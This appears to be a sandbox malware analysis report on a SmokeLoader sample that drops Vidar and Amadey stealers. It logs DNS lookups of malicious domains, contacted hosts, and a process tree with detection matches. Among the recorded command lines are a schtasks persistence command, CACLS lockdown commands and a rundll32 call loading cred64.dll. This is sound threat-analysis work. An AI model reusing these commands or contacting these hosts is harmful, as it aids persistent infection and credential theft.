                                              Dec 13, 2022 20:08:54.785937071 CET192.168.2.38.8.8.80xd15dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.950651884 CET192.168.2.38.8.8.80x1964Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.123325109 CET192.168.2.38.8.8.80x4828Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.290416002 CET192.168.2.38.8.8.80x3cfdStandard query (0)kikangalaassociates.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.201690912 CET192.168.2.38.8.8.80x915dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.441494942 CET192.168.2.38.8.8.80xc783Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:58.035155058 CET192.168.2.38.8.8.80x9924Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 13, 2022 20:08:50.035814047 CET8.8.8.8192.168.2.30xa2e4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.017219067 CET8.8.8.8192.168.2.30x6732No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.205988884 CET8.8.8.8192.168.2.30x5841No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.385179043 CET8.8.8.8192.168.2.30xdcbfNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.578742981 CET8.8.8.8192.168.2.30x18e8No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.856148958 CET8.8.8.8192.168.2.30xe2e0No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.037960052 CET8.8.8.8192.168.2.30x3671No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.219321012 CET8.8.8.8192.168.2.30xd855No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.493618965 CET8.8.8.8192.168.2.30x7d94No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.667063951 CET8.8.8.8192.168.2.30xc32bNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.859112024 CET8.8.8.8192.168.2.30xae2aNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.034872055 CET8.8.8.8192.168.2.30x149cNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.225176096 CET8.8.8.8192.168.2.30xdba4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.402158022 CET8.8.8.8192.168.2.30xeed4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.573211908 CET8.8.8.8192.168.2.30x39faNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.742464066 CET8.8.8.8192.168.2.30xc81dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.936579943 CET8.8.8.8192.168.2.30x1a49No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.106309891 CET8.8.8.8192.168.2.30xa128No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.274415970 CET8.8.8.8192.168.2.30xda09No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.454756975 CET8.8.8.8192.168.2.30x4194No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.623677015 CET8.8.8.8192.168.2.30xef8dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.803195000 CET8.8.8.8192.168.2.30xd15dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.967981100 CET8.8.8.8192.168.2.30x1964No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.140712023 CET8.8.8.8192.168.2.30x4828No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:55.325320959 CET8.8.8.8192.168.2.30x3cfdNo error (0)kikangalaassociates.com185.98.131.207A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.218902111 CET8.8.8.8192.168.2.30x915dNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:56.458796024 CET8.8.8.8192.168.2.30xc783No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:58.052490950 CET8.8.8.8192.168.2.30x9924No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                                              • fs.microsoft.com
                                              • kikangalaassociates.com
                                              • login.live.com
                                              • iglyuyotce.org
                                                • r3oidsofsios.com
                                              • csigrnv.com
                                              • sigiagum.org
                                              • rdpcbv.net
                                              • arfujedsl.net
                                              • nvtalqe.net
                                              • bprujbtf.com
                                              • ecaapsyol.com
                                              • xmhgchsawe.net
                                              • qmwhbha.net
                                              • hhqusu.net
                                              • nvtkvayro.org
                                              • aroxyrayv.com
                                              • ufutmn.net
                                              • gomlgu.com
                                              • mqmkmifvh.org
                                              • okpnuoeb.net
                                              • prhgrykwf.org
                                              • umgkkbyv.org
                                              • bljwplujsw.com
                                              • jqdieq.net
                                              • qrlpwddo.net
                                              • hmsoq.net
                                              • rwsblto.com
                                              • ikihxohlb.com
                                              • sdeypctxsi.net
                                              • 31.41.244.228
                                              • jenhfc.net
                                              • 62.204.41.79

                                              Click to jump to process

                                              Target ID:0
                                              Start time:20:07:45
                                              Start date:13/12/2022
                                              Path:C:\Users\user\Desktop\kmxId0uLRn.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\kmxId0uLRn.exe
                                              Imagebase:0x400000
                                              File size:244736 bytes
                                              MD5 hash:C8782DA2928F63712D03D0EA36C57C3F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.354530381.0000000000631000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.354314042.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low

                                              Target ID:1
                                              Start time:20:07:57
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              Target ID:11
                                              Start time:20:08:51
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Roaming\thgcici
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\thgcici
                                              Imagebase:0x400000
                                              File size:244736 bytes
                                              MD5 hash:C8782DA2928F63712D03D0EA36C57C3F
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.456935359.00000000006C1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.456463598.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 69%, ReversingLabs
                                              Reputation:low

                                              Target ID:12
                                              Start time:20:08:55
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\8F68.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\8F68.exe
                                              Imagebase:0xc10000
                                              File size:559616 bytes
                                              MD5 hash:46F30465FA693033E7D3D78468406C0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Target ID:13
                                              Start time:20:08:55
                                              Start date:13/12/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff745070000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:14
                                              Start time:20:08:56
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\9545.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\9545.exe
                                              Imagebase:0xdd0000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.403992347.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.402947790.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.403831524.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\9545.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 53%, ReversingLabs
                                              Reputation:low

                                              Target ID:17
                                              Start time:20:08:57
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              Target ID:18
                                              Start time:20:09:00
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\explorer.exe
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:19
                                              Start time:20:09:03
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              Target ID:20
                                              Start time:20:09:03
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 268
                                              Imagebase:0xfa0000
                                              File size:434592 bytes
                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:21
                                              Start time:20:09:04
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
                                              Imagebase:0xf00000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.417948151.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.788503094.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 53%, ReversingLabs

                                              Target ID:22
                                              Start time:20:09:04
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\explorer.exe
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                              Target ID:23
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                                              Imagebase:0xd10000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:24
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff745070000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:25
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
                                              Imagebase:0xb0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:26
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001A.00000000.423609338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:27
                                              Start time:20:09:06
                                              Start date:13/12/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff745070000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:28
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              Imagebase:0xb0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:29
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Imagebase:0xf00000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                              Target ID:30
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "gntuud.exe" /P "user:N"
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:31
                                              Start time:20:09:07
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:32
                                              Start time:20:09:08
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "gntuud.exe" /P "user:R" /E
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:33
                                              Start time:20:09:09
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              Imagebase:0xb0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:34
                                              Start time:20:09:09
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:35
                                              Start time:20:09:09
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "..\2c33368f7d" /P "user:N"
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:36
                                              Start time:20:09:10
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\cacls.exe
                                              Wow64 process (32bit):true
                                              Commandline:CACLS "..\2c33368f7d" /P "user:R" /E
                                              Imagebase:0x9e0000
                                              File size:27648 bytes
                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:38
                                              Start time:20:09:10
                                              Start date:13/12/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\explorer.exe
                                              Imagebase:0x7ff69fe90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language

                                              Target ID:40
                                              Start time:20:09:12
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                              Imagebase:0xe20000
                                              File size:3611360 bytes
                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown

                                              Target ID:41
                                              Start time:20:09:14
                                              Start date:13/12/2022
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                                              Imagebase:0x2a0000
                                              File size:61952 bytes
                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi

                                              Target ID:43
                                              Start time:20:10:01
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Roaming\thgcici
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\thgcici
                                              Imagebase:0x400000
                                              File size:244736 bytes
                                              MD5 hash:C8782DA2928F63712D03D0EA36C57C3F
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
